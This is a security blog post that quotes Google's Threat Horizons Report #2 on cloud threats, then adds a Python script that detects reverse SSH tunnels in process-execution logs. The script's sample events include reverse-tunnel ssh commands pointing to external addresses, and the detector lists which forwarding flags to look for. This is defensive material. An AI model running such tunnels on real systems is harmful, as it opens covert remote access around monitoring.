Google Cybersecurity Action Team Threat Horizons Report #2 Is Out!

Anton Chuvakin
Published in Anton on Security, Feb 15, 2022

This is my completely informal, uncertified, unreviewed and otherwise unofficial blog inspired by my reading of our second Threat Horizons Report (full version, short version) that we just released (the official blog for #1 is here).


My favorite quotes follow below:

  • “Threat actors have been known to use tools native to the Cloud environment rather than downloading custom malware or scripts to avoid detection. This “living off the land” technique has been used extensively in on-premise compromises and is being adopted in Cloud environments.” [A.C. — highlight is mine, just a reminder that “malware-less” intrusions are the norm in the cloud too]
  • “Sliver is an open-source, cross-platform adversary emulation framework that allows adversaries to deploy and control implants on victims’ Windows, Mac, or Linux computers from a central coordinating server.” [A.C. — not all badness is about Cobalt Strike …]
  • “Over the past 12+ months, the actor has launched multiple campaigns against the security and vulnerability research community including the following techniques: Developing fake social media profiles and submitting real bugs to bug bounty programs in order to build credibility. […] Suspected of using 0-days, which were stolen from some of their victims.” [A.C. — imagine being hit by a 0-day that the attacker stole somewhere …]
  • “Google Cloud is continuing to see scanning (400K times a day) and expects similar, if not more scanning levels against all providers, and so we recommend continued vigilance in ensuring patching is effective.” [A.C. — so, no, log4j is not over]
  • “The availability of outbound connections to conduct a reverse SSH tunneling from the Cloud Shell to any endpoint on the Internet is serving as a means for threat actors to distribute malicious campaigns or perform harmful activity.” [A.C. — this is a reminder that an outbound connection is always an ominous sign, cloud or not]
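As an added example (my own illustration, not code from the report or from Google), here is a small detection that flags reverse SSH tunnel invocations in process-execution events, the kind of outbound Cloud Shell activity the last quote describes; the JSON-lines event format, field names and sample commands are constructed assumptions, not a real audit feed.

```python
import json
import shlex

# Constructed sample of process-execution events (one JSON object per line),
# standing in for whatever shell/audit telemetry you collect from Cloud Shell.
SAMPLE_EVENTS = """
{"ts": "2022-02-15T10:01:02Z", "user": "dev1", "cmd": "ssh -N -R 0.0.0.0:2222:localhost:22 user@203.0.113.10"}
{"ts": "2022-02-15T10:02:10Z", "user": "dev2", "cmd": "ssh -L 8080:localhost:80 bastion.example.internal"}
{"ts": "2022-02-15T10:03:44Z", "user": "dev3", "cmd": "ssh -o RemoteForward=9000:127.0.0.1:8080 relay.example.net"}
{"ts": "2022-02-15T10:04:00Z", "user": "dev4", "cmd": "ssh -oRemoteForward=9001:127.0.0.1:8080 relay.example.net"}
{"ts": "2022-02-15T10:05:31Z", "user": "dev5", "cmd": "git pull origin main"}
{"ts": "2022-02-15T10:06:02Z", "user": "dev6", "cmd": "/usr/bin/ssh -R9002:localhost:22 user@198.51.100.7"}
"""


def reverse_forward_specs(cmd: str) -> list[str]:
    """Return the reverse-forward specs requested by an ssh command line.

    Covers the four spellings ssh accepts: '-R spec', '-Rspec',
    '-o RemoteForward=spec' and '-oRemoteForward=spec'. Local (-L) forwards
    are deliberately ignored; only remote forwards open a listener on the far side.
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: not parseable, not flagged
        return []
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    specs: list[str] = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if arg == "-R" and nxt:
            specs.append(nxt)
            i += 1
        elif arg.startswith("-R") and len(arg) > 2:
            specs.append(arg[2:])
        elif arg == "-o" and nxt.lower().startswith("remoteforward="):
            specs.append(nxt.split("=", 1)[1])
            i += 1
        elif arg.lower().startswith("-oremoteforward="):
            specs.append(arg.split("=", 1)[1])
        i += 1
    return specs


def flag_reverse_tunnels(log_text: str) -> list[dict]:
    """Parse JSON-lines events and return those whose command sets up a reverse SSH tunnel."""
    hits = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        specs = reverse_forward_specs(event.get("cmd", ""))
        if specs:
            hits.append({"ts": event["ts"], "user": event["user"], "remote_forwards": specs})
    return hits


if __name__ == "__main__":
    for hit in flag_reverse_tunnels(SAMPLE_EVENTS):
        print(hit)
```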

Enjoy the report!
